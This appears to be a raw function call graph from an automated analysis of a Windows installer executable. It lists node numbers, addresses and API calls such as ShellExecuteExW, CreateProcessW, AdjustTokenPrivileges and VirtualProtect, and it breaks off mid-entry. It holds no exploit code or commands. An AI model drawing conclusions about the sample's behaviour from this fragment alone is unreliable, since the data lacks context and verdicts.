6f1c1072 5122->5123 5125 6f1c156c GlobalFree 5123->5125 5124 6f1c1091 GlobalSize 5126 6f1c109a 5124->5126 5125->5127 5128 6f1c109e GlobalAlloc 5126->5128 5129 6f1c10af 5126->5129 5127->5124 5127->5126 5130 6f1c15c5 3 API calls 5128->5130 5131 6f1c10b8 GlobalFree 5129->5131 5130->5129 5131->5118 5132 402d69 5133 403002 16 API calls 5132->5133 5134 402d6f 5133->5134 5135 401709 5134->5135 5136 405eba 16 API calls 5134->5136 5136->5135 5137 401eea 5138 401ef4 5137->5138 5139 401efe GetDlgItem 5137->5139 5140 403002 16 API calls 5138->5140 5141 401efb 5139->5141 5140->5141 5142 401f3c GetClientRect LoadImageW SendMessageW 5141->5142 5143 40303e 16 API calls 5141->5143 5145 401f9c 5142->5145 5147 401fa7 5142->5147 5143->5142 5146 401fa0 DeleteObject 5145->5146 5145->5147 5146->5147 5148 404eec 5149 404f22 5148->5149 5150 404efc 5148->5150 5152 40575b 8 API calls 5149->5152 5151 40551a 17 API calls 5150->5151 5153 404f09 SetDlgItemTextW 5151->5153 5154 404f2e 5152->5154 5153->5149 5155 401aec 5156 401aa2 5155->5156 5160 401ab1 5155->5160 5157 40303e 16 API calls 5156->5157 5158 401aa7 5157->5158 5159 406719 65 API calls 5158->5159 5159->5160 5161 40216c 5162 40303e 16 API calls 5161->5162 5163 402173 5162->5163 5164 4065cf 2 API calls 5163->5164 5165 402179 5164->5165 5166 402188 5165->5166 5168 40661f wsprintfW 5165->5168 5168->5166 5169 401af0 5170 40303e 16 API calls 5169->5170 5171 401af7 lstrlenW 5170->5171 5173 401afd 5171->5173 5172 40303e 16 API calls 5172->5173 5173->5172 5175 402855 5173->5175 5176 40691b GetFileAttributesW CreateFileW 5173->5176 5176->5173 5177 402af5 5178 402afc 5177->5178 5180 401709 5177->5180 5179 403002 16 API calls 5178->5179 5181 402b03 5179->5181 5182 402b10 SetFilePointer 5181->5182 5182->5180 5184 402b21 5182->5184 5183 403002 16 API calls 5183->5184 5184->5180 5184->5183 5185 402d10 5184->5185 5186 402d35 5185->5186 5187 402d25 5185->5187 5189 405eba 16 API calls 5186->5189 5188 403002 16 API calls 5187->5188 5188->5180 5189->5180 5190 402b75 5191 40303e 16 API calls 5190->5191 5192 402b7c FindFirstFileW 5191->5192 5193 402b90 5192->5193 5196 40661f wsprintfW 5193->5196 5195 402b67 5196->5195 5197 402077 5198 40303e 16 API calls 5197->5198 5199 40207d 5198->5199 5200 40303e 16 API calls 5199->5200 5201 402086 5200->5201 5202 40303e 16 API calls 5201->5202 5203 40208f 5202->5203 5204 40303e 16 API calls 5203->5204 5205 402098 5204->5205 5206 405d3a 23 API calls 5205->5206 5207 4020a4 5206->5207 5214 4069f3 ShellExecuteExW 5207->5214 5209 4020ea 5210 406514 5 API calls 5209->5210 5212 401709 5209->5212 5211 402109 CloseHandle 5210->5211 5211->5212 5214->5209 5215 6f1c1aa7 5216 6f1c156c GlobalFree 5215->5216 5218 6f1c1abf 5216->5218 5217 6f1c1b01 GlobalFree 5218->5217 5219 6f1c1add 5218->5219 5220 6f1c1aed VirtualFree 5218->5220 5219->5217 5220->5217 4568 4036fc SetErrorMode GetVersionExW 4569 403747 GetVersionExW 4568->4569 4571 40377e 4568->4571 4570 403769 4569->4570 4570->4571 4572 4037e5 4571->4572 4573 4068e6 5 API calls 4571->4573 4574 40619e 3 API calls 4572->4574 4573->4572 4575 4037fb lstrlenA 4574->4575 4575->4572 4576 403809 4575->4576 4577 4068e6 5 API calls 4576->4577 4578 403810 4577->4578 4579 4068e6 5 API calls 4578->4579 4580 403817 4579->4580 4581 4068e6 5 API calls 4580->4581 4582 403823 #17 OleInitialize SHGetFileInfoW 4581->4582 4658 406b1a lstrcpynW 4582->4658 4585 403871 GetCommandLineW 4659 406b1a lstrcpynW 4585->4659 4587 403882 4588 4065f6 CharNextW 4587->4588 4589 4038bc CharNextW 4588->4589 4590 4039aa GetTempPathW 4589->4590 4601 4038d5 4589->4601 4660 403ca5 4590->4660 4592 4039c2 4593 4039c6 GetWindowsDirectoryW lstrcatW 4592->4593 4594 403a1c DeleteFileW 4592->4594 4595 403ca5 12 API calls 4593->4595 4670 4033ed GetTickCount GetModuleFileNameW 4594->4670 4597 4039e2 4595->4597 4597->4594 4600 4039e6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4597->4600 4598 4065f6 CharNextW 4598->4601 4599 403a2f 4606 4065f6 CharNextW 4599->4606 4609 403ab2 4599->4609 4643 403aa4 4599->4643 4602 403ca5 12 API calls 4600->4602 4601->4590 4601->4598 4605 403996 4601->4605 4604 403a14 4602->4604 4604->4594 4604->4609 4755 406b1a lstrcpynW 4605->4755 4621 403a4e 4606->4621 4775 4036d2 4609->4775 4611 403bf9 4613 406aa8 MessageBoxIndirectW 4611->4613 4612 403c0c 4614 403c04 ExitProcess 4612->4614 4615 403c15 GetCurrentProcess OpenProcessToken 4612->4615 4613->4614 4619 403c61 4615->4619 4620 403c2d LookupPrivilegeValueW AdjustTokenPrivileges 4615->4620 4616 403a78 4756 406638 4616->4756 4617 403ab9 4624 4064fc 5 API calls 4617->4624 4623 4068e6 5 API calls 4619->4623 4620->4619 4621->4616 4621->4617 4629 403c68 4623->4629 4625 403abe lstrcatW 4624->4625 4626 403ae2 lstrcatW lstrcmpiW 4625->4626 4627 403ad3 lstrcatW 4625->4627 4626->4609 4632 403b09 4626->4632 4627->4626 4630 403c7d ExitWindowsEx 4629->4630 4631 403c8a 4629->4631 4630->4614 4630->4631 4634 401533 89 API calls 4631->4634 4635 403b12 4632->4635 4636 403b19 4632->4636 4634->4614 4638 405e3e 4 API calls 4635->4638 4639 405e1e 2 API calls 4636->4639 4637 403a99 4772 406b1a lstrcpynW 4637->4772 4641 403b17 4638->4641 4642 403b1e SetCurrentDirectoryW 4639->4642 4641->4642 4644 403b41 4642->4644 4645 403b32 4642->4645 4698 405a3e 4643->4698 4774 406b1a lstrcpynW 4644->4774 4773 406b1a lstrcpynW 4645->4773 4648 405eba 16 API calls 4649 403b71 DeleteFileW 4648->4649 4650 403b7c CopyFileW 4649->4650 4655 403b4f 4649->4655 4650->4655 4651 403bd5 4653 40623d 34 API calls 4651->4653 4652 40623d 34 API calls 4652->4655 4653->4609 4654 405eba 16 API calls 4654->4655 4655->4648 4655->4651 4655->4652 4655->4654 4656 4066d6 2 API calls 4655->4656 4657 403bc0 CloseHandle 4655->4657 4656->4655 4657->4655 4658->4585 4659->4587 4661 406d3d 5 API calls 4660->4661 4663 403cb1 4661->4663 4662 403cbb 4662->4592 4663->4662 4664 406556 3 API calls 4663->4664 4665 403cc3 4664->4665 4666 405e1e 2 API calls 4665->4666 4667 403cc9 4666->4667 4668 406a56 2 API calls 4667->4668 4669 403cd4 4668->4669 4669->4592 4782 40691b GetFileAttributesW CreateFileW 4670->4782 4672 40342f 4697 40343c 4672->4697 4783 406b1a lstrcpynW 4672->4783 4674 403452 4784 406d10 lstrlenW 4674->4784 4678 403463 GetFileSize 4679 40356a 4678->4679 4695 40347c 4678->4695 4789 403389 4679->4789 4681 40311b ReadFile 4681->4695 4682 403579 4684 4035ba GlobalAlloc 4682->4684 4682->4697 4800 403131 SetFilePointer 4682->4800 4683 403638 4687 403389 6 API calls 4683->4687 4801 403131 SetFilePointer 4684->4801 4687->4697 4688 4035d7 4691 403148 30 API calls 4688->4691 4689 403596 4692 406948 ReadFile 4689->4692 4690 403389 6 API calls 4690->4695 4694 4035e6 4691->4694 4693 4035a8 4692->4693 4693->4684 4693->4697 4694->4694 4696 403616 SetFilePointer 4694->4696 4694->4697 4695->4679 4695->4681 4695->4683 4695->4690 4695->4697 4696->4697 4697->4599 4699 4068e6 5 API calls 4698->4699 4700 405a52 4699->4700 4701 405a5b GetUserDefaultUILanguage 4700->4701 4702 405a6d 4700->4702 4802 40661f wsprintfW 4701->4802 4704 406977 3 API calls 4702->4704 4706 405a9c 4704->4706 4705 405a6b 4803 40597f 4705->4803 4707 405abb lstrcatW 4706->4707 4708 406977 3 API calls 4706->4708 4707->4705 4708->4707 4711 406638 18 API calls 4712 405aed 4711->4712 4713 405b87 4712->4713 4715 406977 3 API calls 4712->4715 4714 406638 18 API calls 4713->4714 4716 405b8d 4714->4716 4717 405b20 4715->4717 4718 405b9d LoadImageW 4716->4718 4719 405eba 16 API calls 4716->4719 4717->4713 4722 405b44 lstrlenW 4717->4722 4726 4065f6 CharNextW 4717->4726 4720 405c4a 4718->4720 4721 405bcd RegisterClassW 4718->4721 4719->4718 4725 401533 89 API calls 4720->4725 4723 405c01 SystemParametersInfoW CreateWindowExW 4721->4723 4724 405bfa 4721->4724 4727 405b54 lstrcmpiW 4722->4727 4728 405b7a 4722->4728 4723->4720 4724->4609 4729 405c50 4725->4729 4730 405b3f 4726->4730 4727->4728 4731 405b64 GetFileAttributesW 4727->4731 4732 406556 3 API calls 4728->4732 4729->4724 4734 40597f 17 API calls 4729->4734 4730->4722 4733 405b70 4731->4733 4735 405b80 4732->4735 4733->4728 4737 406d10 2 API calls 4733->4737 4738 405c5d 4734->4738 4811 406b1a lstrcpynW 4735->4811 4737->4728 4739 405c69 ShowWindow 4738->4739 4740 405ceb 4738->4740 4741 40619e 3 API calls 4739->4741 4742 405864 92 API calls 4740->4742 4743 405c81 4741->4743 4744 405cf1 4742->4744 4745 405c8f GetClassInfoW 4743->4745 4748 40619e 3 API calls 4743->4748 4746 405d0f 4744->4746 4747 405cf5 4744->4747 4750 405ca2 GetClassInfoW RegisterClassW 4745->4750 4751 405cb8 DialogBoxParamW 4745->4751 4749 401533 89 API calls 4746->4749 4747->4724 4752 401533 89 API calls 4747->4752 4748->4745 4753 405d16 4749->4753 4750->4751 4754 401533 89 API calls 4751->4754 4752->4724 4753->4753 4754->4724 4755->4590 4813 406b1a lstrcpynW 4756->4813 4758 406649 4759 406bc5 4 API calls 4758->4759 4760 40664f 4759->4760 4761 403a86 4760->4761 4762 406d3d 5 API calls 4760->4762 4761->4609 4771 406b1a lstrcpynW 4761->4771 4769 40665b 4762->4769 4763 40668b lstrlenW 4764 406697 4763->4764 4763->4769 4765 406556 3 API calls 4764->4765 4767 40669c GetFileAttributesW 4765->4767 4766 4065cf 2 API calls 4766->4769 4767->4761 4768 4066a8 4767->4768 4768->4761 4769->4761 4769->4763 4769->4766 4770 406d10 2 API calls 4769->4770 4770->4763 4771->4637 4772->4643 4773->4644 4774->4655 4776 4036ea 4775->4776 4777 4036dc CloseHandle 4775->4777 4814 403d13 4776->4814 4777->4776 4782->4672 4783->4674 4785 406d1f 4784->4785 4786 403458 4785->4786 4787 406d25 CharPrevW 4785->4787 4788 406b1a lstrcpynW 4786->4788 4787->4785 4787->4786 4788->4678 4790 403390 4789->4790 4791 4033a8 4789->4791 4794 4033a0 4790->4794 4795 403399 DestroyWindow 4790->4795 4792 4033b1 4791->4792 4793 4033b9 GetTickCount 4791->4793 4796 40620f 2 API calls 4792->4796 4797 4033c7 CreateDialogParamW ShowWindow 4793->4797 4798 4033ec 4793->4798 4794->4682 4795->4794 4799 4033b8 4796->4799 4797->4798 4798->4682 4799->4682 4800->4689 4801->4688 4802->4705 4804 405992 4803->4804 4812 40661f wsprintfW 4804->4812 4806 405a0b 4807 405d1b 17 API calls 4806->4807 4809 405a10 4807->4809 4808 405a39 4808->4711 4809->4808 4810 405eba 16 API calls 4809->4810 4810->4809 4811->4713 4812->4806 4813->4758 4815 403d21 4814->4815 4816 403d26 FreeLibrary GlobalFree 4815->4816 4817 4036ef 4815->4817 4816->4816 4816->4817 4818 406719 4817->4818 4819 406638 18 API calls 4818->4819 4820 40673b 4819->4820 4821 406744 DeleteFileW 4820->4821 4822 40675b 4820->4822 4823 4036fb OleUninitialize 4821->4823 4822->4823 4825 40687b 4822->4825 4857 406b1a lstrcpynW 4822->4857 4823->4611 4823->4612 4825->4823 4827 4065cf 2 API calls 4825->4827 4826 406783 4828 40679b 4826->4828 4829 40678d lstrcatW 4826->4829 4830 406898 4827->4830 4832 406d10 2 API calls 4828->4832 4831 4067a1 4829->4831 4830->4823 4834 40689c 4830->4834 4833 4067b2 lstrcatW 4831->4833 4835 4067ba lstrlenW FindFirstFileW 4831->4835 4832->4831 4833->4835 4836 406556 3 API calls 4834->4836 4835->4825 4844 4067e3 4835->4844 4837 4068a2 4836->4837 4838 406585 5 API calls 4837->4838 4839 4068ae 4838->4839 4841 4068d1 4839->4841 4842 4068b2 4839->4842 4840 40685d FindNextFileW 4840->4844 4845 406874 FindClose 4840->4845 4846 405d3a 23 API calls 4841->4846 4842->4823 4847 405d3a 23 API calls 4842->4847 4844->4840 4851 406719 58 API calls 4844->4851 4853 406829 4844->4853 4858 406b1a lstrcpynW 4844->4858 4845->4825 4846->4823 4849 4068be 4847->4849 4850 40623d 34 API calls 4849->4850 4852 4068c7 4850->4852 4851->4853 4852->4823 4853->4840 4854 405d3a 23 API calls 4853->4854 4855 405d3a 23 API calls 4853->4855 4856 40623d 34 API calls 4853->4856 4859 406585 4853->4859 4854->4840 4855->4853 4856->4853 4857->4826 4858->4844 4860 406b9d 2 API calls 4859->4860 4861 406591 4860->4861 4862 4065b3 4861->4862 4863 4065a1 RemoveDirectoryW 4861->4863 4864 4065a9 DeleteFileW 4861->4864 4862->4853 4865 4065af 4863->4865 4864->4865 4865->4862 4866 4065be SetFileAttributesW 4865->4866 4866->4862 5221 402e7c SendMessageW 5222 402e94 InvalidateRect 5221->5222 5223 402ea1 5221->5223 5222->5223 4894 4025ff 4895 402608 4894->4895 4896 40262f 4894->4896 4898 4030c1 16 API calls 4895->4898 4897 40303e 16 API calls 4896->4897 4899 402636 4897->4899 4900 40260f 4898->4900 4906 40307c 4899->4906 4901 402615 4900->4901 4905 402648 4900->4905 4903 40303e 16 API calls 4901->4903 4904 40261c RegDeleteValueW RegCloseKey 4903->4904 4904->4905 4907 403089 4906->4907 4908 403090 4906->4908 4907->4905 4908->4907 4910 40141e 4908->4910 4911 4062d8 RegOpenKeyExW 4910->4911 4912 40145b 4911->4912 4913 401514 4912->4913 4914 40146f RegEnumValueW 4912->4914 4918 401493 4912->4918 4913->4907 4915 401503 RegCloseKey 4914->4915 4914->4918 4915->4913 4916 4014ce RegEnumKeyW 4917 4014d8 RegCloseKey 4916->4917 4916->4918 4919 4068e6 5 API calls 4917->4919 4918->4915 4918->4916 4918->4917 4920 40141e 6 API calls 4918->4920 4921 4014e9 4919->4921 4920->4918 4921->4913 4922 4014ed RegDeleteKeyW 4921->4922 4922->4913 5224 401000 5225 401039 BeginPaint GetClientRect 5224->5225 5226 40100a DefWindowProcW 5224->5226 5228 40110f 5225->5228 5229 40119a 5226->5229 5230 401117 5228->5230 5231 40107e CreateBrushIndirect FillRect DeleteObject 5228->5231 5232 401185 EndPaint 5230->5232 5233 40111d CreateFontIndirectW 5230->5233 5231->5228 5232->5229 5233->5232 5234 401130 6 API calls 5233->5234 5234->5232 3850 401d01 3851 401d0f 3850->3851 3857 401d5d 3850->3857 3854 401d50 3851->3854 3859 401d1e 3851->3859 3852 401d67 3860 401709 3852->3860 3886 406b1a lstrcpynW 3852->3886 3853 401d8c GlobalAlloc 3867 405eba 3853->3867 3855 405eba 16 API calls 3854->3855 3855->3857 3857->3852 3857->3853 3883 406b1a lstrcpynW 3859->3883 3861 401d79 GlobalFree 3861->3860 3863 401d2d 3884 406b1a lstrcpynW 3863->3884 3865 401d3c 3885 406b1a lstrcpynW 3865->3885 3878 405ec5 3867->3878 3868 4060fe 3870 406113 3868->3870 3894 406b1a lstrcpynW 3868->3894 3870->3860 3872 4060c9 lstrlenW 3872->3878 3873 405fde GetSystemDirectoryW 3873->3878 3874 405ff1 GetWindowsDirectoryW 3874->3878 3877 405eba 10 API calls 3877->3872 3878->3868 3878->3872 3878->3873 3878->3874 3878->3877 3879 405eba 10 API calls 3878->3879 3880 406d3d CharNextW CharNextW CharNextW CharNextW CharPrevW 3878->3880 3881 40606a lstrcatW 3878->3881 3882 406036 SHGetPathFromIDListW CoTaskMemFree 3878->3882 3887 406977 3878->3887 3892 40661f wsprintfW 3878->3892 3893 406b1a lstrcpynW 3878->3893 3879->3878 3880->3878 3881->3878 3882->3878 3883->3863 3884->3865 3885->3860 3886->3861 3895 4062d8 3887->3895 3890 4069dd 3890->3878 3891 4069ac RegQueryValueExW RegCloseKey 3891->3890 3892->3878 3893->3878 3894->3870 3896 4062e7 3895->3896 3897 4062f0 RegOpenKeyExW 3896->3897 3898 4062eb 3896->3898 3897->3898 3898->3890 3898->3891 5235 401b03 5236 403002 16 API calls 5235->5236 5237 401b0a 5236->5237 5238 403002 16 API calls 5237->5238 5239 401b15 5238->5239 5240 40303e 16 API calls 5239->5240 5241 401b20 lstrlenW 5240->5241 5242 401b3c 5241->5242 5244 401b67 5241->5244 5242->5244 5247 406b1a lstrcpynW 5242->5247 5245 401b5b 5245->5244 5246 401b5f lstrlenW 5245->5246 5246->5244 5247->5245 5248 401c04 5249 403002 16 API calls 5248->5249 5250 401c0e 5249->5250 5251 403002 16 API calls 5250->5251 5252 401bb2 5251->5252 5253 404085 5254 4040c2 5253->5254 5255 4040ac 5253->5255 5257 4040cc GetDlgItem 5254->5257 5265 40413f 5254->5265 5314 406a3a GetDlgItemTextW 5255->5314 5259 4040e4 5257->5259 5258 4040b7 5261 406d3d 5 API calls 5258->5261 5263 4040f8 SetWindowTextW 5259->5263 5266 406bc5 4 API calls 5259->5266 5260 40415e 5262 4040bd 5260->5262 5316 406a3a GetDlgItemTextW 5260->5316 5261->5262 5271 40575b 8 API calls 5262->5271 5267 40551a 17 API calls 5263->5267 5265->5260 5269 405eba 16 API calls 5265->5269 5272 4040ee 5266->5272 5273 404115 5267->5273 5268 404255 5274 406638 18 API calls 5268->5274 5270 4041ba SHBrowseForFolderW 5269->5270 5270->5260 5277 4041d5 CoTaskMemFree 5270->5277 5278 404416 5271->5278 5272->5263 5282 406556 3 API calls 5272->5282 5275 40551a 17 API calls 5273->5275 5276 40425b 5274->5276 5279 404120 5275->5279 5317 406b1a lstrcpynW 5276->5317 5281 406556 3 API calls 5277->5281 5315 405503 SendMessageW 5279->5315 5285 4041e2 5281->5285 5282->5263 5284 404275 5287 4068e6 5 API calls 5284->5287 5288 40421f SetDlgItemTextW 5285->5288 5291 405eba 16 API calls 5285->5291 5286 404126 5289 4068e6 5 API calls 5286->5289 5290 40427b 5287->5290 5288->5260 5289->5262 5300 406d10 2 API calls 5290->5300 5301 4042d0 5290->5301 5303 40432a 5290->5303 5293 404200 lstrcmpiW 5291->5293 5293->5288 5295 404214 lstrcatW 5293->5295 5294 4042dc 5296 406bc5 4 API calls 5294->5296 5295->5288 5297 4042e2 GetDiskFreeSpaceW 5296->5297 5299 40430a MulDiv 5297->5299 5297->5303 5299->5303 5300->5290 5318 406b1a lstrcpynW 5301->5318 5302 4043a1 5305 4043c9 EnableWindow 5302->5305 5307 401533 89 API calls 5302->5307 5303->5302 5319 405560 5303->5319 5305->5262 5308 4043f2 5305->5308 5306 404389 5309 4043a3 SetDlgItemTextW 5306->5309 5310 40438d 5306->5310 5311 4043c7 5307->5311 5308->5262 5327 40553c SendMessageW 5308->5327 5309->5302 5313 405560 19 API calls 5310->5313 5311->5305 5313->5302 5314->5258 5315->5286 5316->5268 5317->5284 5318->5294 5320 405575 5319->5320 5321 405eba 16 API calls 5320->5321 5322 4055fe 5321->5322 5323 405eba 16 API calls 5322->5323 5324 40560a 5323->5324 5325 405eba 16 API calls 5324->5325 5326 405616 lstrlenW wsprintfW SetDlgItemTextW 5325->5326 5326->5306 5327->5262 5328 401b88 5329 40303e 16 API calls 5328->5329 5330 401b8f 5329->5330 5331 40303e 16 API calls 5330->5331 5332 401b98 5331->5332 5333 401ba0 lstrcmpiW 5332->5333 5334 401ba8 lstrcmpW 5332->5334 5335 401bae 5333->5335 5334->5335 5336 403d8a 5337 403ec4 5336->5337 5338 403d9f 5336->5338 5339 403ed2 5337->5339 5340 403f45 5337->5340 5342 40551a 17 API calls 5338->5342 5346 403eff GetDlgItem SendMessageW EnableWindow 5339->5346 5358 403f40 5339->5358 5341 403f50 GetDlgItem 5340->5341 5340->5358 5345 404013 5341->5345 5348 403f72 5341->5348 5344 403e0e 5342->5344 5343 40575b 8 API calls 5347 404058 5343->5347 5349 40551a 17 API calls 5344->5349 5350 404024 5345->5350 5345->5358 5365 40553c SendMessageW 5346->5365 5352 403fa2 SendMessageW LoadCursorW SetCursor 5348->5352 5348->5358 5353 403e1d CheckDlgButton EnableWindow GetDlgItem 5349->5353 5356 404043 5350->5356 5357 40402c SendMessageW 5350->5357 5366 4069f3 ShellExecuteExW 5352->5366 5364 405503 SendMessageW 5353->5364 5356->5347 5361 404048 SendMessageW 5356->5361 5357->5356 5358->5343 5359 404005 LoadCursorW SetCursor 5359->5345 5360 403e50 SendMessageW 5362 403e75 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5360->5362 5363 403e6c GetSysColor 5360->5363 5361->5347 5362->5347 5363->5362 5364->5360 5365->5358 5366->5359 5367 40568c lstrlenW WideCharToMultiByte 5368 401e8e 5369 403002 16 API calls 5368->5369 5370 401e94 IsWindow 5369->5370 5371 401bb2 5370->5371 4437 404f92 4438 404fb1 4437->4438 4439 405133 4437->4439 4438->4439 4440 404fbd 4438->4440 4441 405147 GetDlgItem GetDlgItem 4439->4441 4442 405180 4439->4442 4443 404fc2 SetWindowPos 4440->4443 4444 404fdc 4440->4444 4445 40551a 17 API calls 4441->4445 4446 4051d7 4442->4446 4456 401399 89 API calls 4442->4456 4447 40511f 4443->4447 4448 404fe1 ShowWindow 4444->4448 4449 40502f 4444->4449 4451 40516a SetClassLongW 4445->4451 4450 4054e8 SendMessageW 4446->4450 4463 40512e 4446->4463 4457 40575b 8 API calls 4447->4457 4448->4447 4452 405006 GetWindowLongW 4448->4452 4453 405051 4449->4453 4454 405037 DestroyWindow 4449->4454 4480 4051e9 4450->4480 4455 401533 89 API calls 4451->4455 4452->4447 4458 405022 ShowWindow 4452->4458 4459 405056 SetWindowLongW 4453->4459 4460 405069 4453->4460 4465 405468 4454->4465 4455->4442 4461 4051b0 4456->4461 4457->4463 4458->4447 4459->4463 4460->4447 4467 405075 GetDlgItem 4460->4467 4461->4446 4462 4051b4 SendMessageW 4461->4462 4462->4463 4464 401533 89 API calls 4464->4480 4465->4463 4468 40549b ShowWindow 4465->4468 4466 40546a DestroyWindow EndDialog 4466->4465 4469 405091 SendMessageW IsWindowEnabled 4467->4469 4470 4050b4 4467->4470 4468->4463 4469->4463 4472 4050b0 4469->4472 4473 4050c3 4470->4473 4474 405106 SendMessageW 4470->4474 4475 4050d5 4470->4475 4484 4050bb 4470->4484 4471 405eba 16 API calls 4471->4480 4472->4470 4473->4474 4473->4484 4474->4447 4478 4050ec 4475->4478 4479 4050de 4475->4479 4476 40551a 17 API calls 4476->4480 4477 405958 SendMessageW 4481 405104 4477->4481 4483 401533 89 API calls 4478->4483 4513 401533 4479->4513 4480->4463 4480->4464 4480->4466 4480->4471 4480->4476 4486 40551a 17 API calls 4480->4486 4499 4053aa DestroyWindow 4480->4499 4481->4447 4485 4050f3 4483->4485 4484->4477 4485->4447 4485->4484 4487 40526d GetDlgItem 4486->4487 4488 405294 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 4487->4488 4492 405288 4487->4492 4488->4492 4489 4052e9 GetSystemMenu EnableMenuItem SendMessageW 4490 405316 SendMessageW 4489->4490 4489->4492 4490->4492 4492->4488 4492->4489 4508 405503 SendMessageW 4492->4508 4509 405d1b 4492->4509 4512 406b1a lstrcpynW 4492->4512 4495 405348 lstrlenW 4496 405eba 16 API calls 4495->4496 4497 405362 SetWindowTextW 4496->4497 4498 401399 89 API calls 4497->4498 4498->4480 4499->4465 4500 4053c4 CreateDialogParamW 4499->4500 4500->4465 4501 4053f7 4500->4501 4502 40551a 17 API calls 4501->4502 4503 405402 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4502->4503 4504 401399 89 API calls 4503->4504 4505 405448 4504->4505 4505->4463 4506 405450 ShowWindow 4505->4506 4507 4054e8 SendMessageW 4506->4507 4507->4465 4508->4492 4510 405eba 16 API calls 4509->4510 4511 405d29 SetWindowTextW 4510->4511 4511->4492 4512->4495 4514 401399 89 API calls 4513->4514 4515 401547 4514->4515 4515->4484 4539 6f1c1a4a 4540 6f1c1a5a VirtualProtect 4539->4540 4541 6f1c1aa1 4539->4541 4540->4541 5372 6f1c12c6 5373 6f1c101b 5 API calls 5372->5373 5374 6f1c12df 5373->5374 4542 40211b 4543 40303e 16 API calls 4542->4543 4544 402121 4543->4544 4545 405d3a 23 API calls 4544->4545 4546 40212b 4545->4546 4555 4066d6 CreateProcessW 4546->4555 4549 40215b 4551 402110 CloseHandle 4549->4551 4552 401709 4549->4552 4551->4552 4553 40214b 4553->4549 4563 40661f wsprintfW 4553->4563 4556 402131 4555->4556 4557 406709 CloseHandle 4555->4557 4556->4549 4556->4552 4558 406514 WaitForSingleObject 4556->4558 4557->4556 4559 40652b 4558->4559 4560 406541 GetExitCodeProcess 4559->4560 4564 40620f 4559->4564 4560->4553 4563->4549 4565 406221 PeekMessageW 4564->4565 4566 406217 DispatchMessageW 4565->4566 4567 406239 WaitForSingleObject 4565->4567 4566->4565 4567->4559 5375 6f1c10c7 5381 6f1c10f8 5375->5381 5376 6f1c12be GlobalFree 5377 6f1c11d7 GlobalAlloc 5377->5381 5378 6f1c1258 GlobalFree 5378->5381 5379 6f1c1548 3 API calls 5379->5381 5380 6f1c12ba 5380->5376 5381->5376 5381->5377 5381->5378 5381->5379 5381->5380 5382 6f1c1296 GlobalFree 5381->5382 5383 6f1c15eb 2 API calls 5381->5383 5384 6f1c1638 lstrcpyW 5381->5384 5386 6f1c1165 GlobalAlloc 5381->5386 5382->5381 5385 6f1c11ca GlobalFree 5383->5385 5387 6f1c11ab GlobalFree 5384->5387 5385->5381 5386->5381 5387->5381 5388 6f1c1cc7 5389 6f1c1cee 5388->5389 5390 6f1c1d2f GlobalFree 5389->5390 5391 6f1c1d4e 5389->5391 5390->5391 5392 6f1c15eb 2 API calls 5391->5392 5393 6f1c1de5 GlobalFree GlobalFree 5392->5393 5394 40291d 5395 403002 16 API calls 5394->5395 5400 40292e 5395->5400 5396 402aa2 SetFilePointer 5397 402aee 5399 402980 ReadFile 5399->5396 5399->5400 5400->5396 5400->5397 5400->5399 5401 406948 ReadFile 5400->5401 5402 406484 5 API calls 5400->5402 5403 402ae4 5400->5403 5404 4029c5 MultiByteToWideChar 5400->5404 5406 4029f6 SetFilePointer MultiByteToWideChar 5400->5406 5401->5400 5402->5400 5407 40661f wsprintfW 5403->5407 5404->5400 5406->5400 5407->5397 5408 40219d 5409 40303e 16 API calls 5408->5409 5410 4021a4 5409->5410 5411 4068e6 5 API calls 5410->5411 5412 4021b5 5411->5412 5413 402ea5 5412->5413 5414 4021ce GlobalAlloc 5412->5414 5414->5413 5415 4021e3 5414->5415 5416 4068e6 5 API calls 5415->5416 5417 4021ea 5416->5417 5418 4068e6 5 API calls 5417->5418 5420 4021f3 5418->5420 5419 40224e GlobalFree 5419->5413 5420->5419 5425 40661f wsprintfW 5420->5425 5422 402237 5426 40661f wsprintfW 5422->5426 5424 40224c 5424->5419 5425->5422 5426->5424 5427 40441e GetDlgItem GetDlgItem 5428 404472 7 API calls 5427->5428 5433 404698 5427->5433 5429 404515 DeleteObject 5428->5429 5430 404508 SendMessageW 5428->5430 5431 404524 5429->5431 5430->5429 5438 405eba 16 API calls 5431->5438 5439 404562 5431->5439 5432 4047cf 5434 404814 5432->5434 5435 4048a9 5432->5435 5433->5432 5443 4056da 5 API calls 5433->5443 5458 40472a 5433->5458 5440 4048fe 5434->5440 5446 404833 SendMessageW 5434->5446 5436 4048d4 5435->5436 5437 4048b8 SendMessageW 5435->5437 5441 4048de 5436->5441 5457 404914 5436->5457 5437->5440 5444 40453a SendMessageW SendMessageW 5438->5444 5445 40551a 17 API calls 5439->5445 5442 40575b 8 API calls 5440->5442 5448 4048e7 ImageList_Destroy 5441->5448 5449 4048ee 5441->5449 5450 404b26 5442->5450 5443->5458 5444->5431 5451 40457a 5445->5451 5446->5440 5452 404850 SendMessageW 5446->5452 5447 4047b7 SendMessageW 5447->5432 5448->5449 5449->5440 5453 4048f7 GlobalFree 5449->5453 5454 40551a 17 API calls 5451->5454 5455 404869 5452->5455 5453->5440 5465 404586 5454->5465 5461 40487f SendMessageW 5455->5461 5456 404af4 ShowWindow GetDlgItem ShowWindow 5456->5440 5464 4054b6 89 API calls 5457->5464 5471 40494b 5457->5471 5474 404add 5457->5474 5458->5432 5458->5447 5459 404665 GetWindowLongW SetWindowLongW 5460 40467b 5459->5460 5462 404692 5460->5462 5463 404682 ShowWindow 5460->5463 5461->5457 5480 405503 SendMessageW 5462->5480 5463->5462 5464->5471 5465->5459 5466 4045de SendMessageW 5465->5466 5467 40461a SendMessageW 5465->5467 5468 40462d SendMessageW 5465->5468 5469 404661 5465->5469 5466->5465 5467->5465 5468->5465 5469->5459 5469->5460 5473 404989 SendMessageW 5471->5473 5478 4049a3 5471->5478 5472 404aaf InvalidateRect 5476 404abe 5472->5476 5473->5478 5474->5440 5474->5456 5475 404a93 5475->5472 5475->5476 5476->5474 5479 405560 19 API calls 5476->5479 5477 404a39 SendMessageW SendMessageW 5477->5478 5478->5475 5478->5477 5479->5474 5480->5433 5481 401aa1 5482 401aa2 5481->5482 5483 40303e 16 API calls 5482->5483 5484 401aa7 5483->5484 5485 406719 65 API calls 5484->5485 5486 401ab1 5485->5486 5487 402ba3 5488 40303e 16 API calls 5487->5488 5489 402bb2 5488->5489 5490 402bc9 5489->5490 5491 40303e 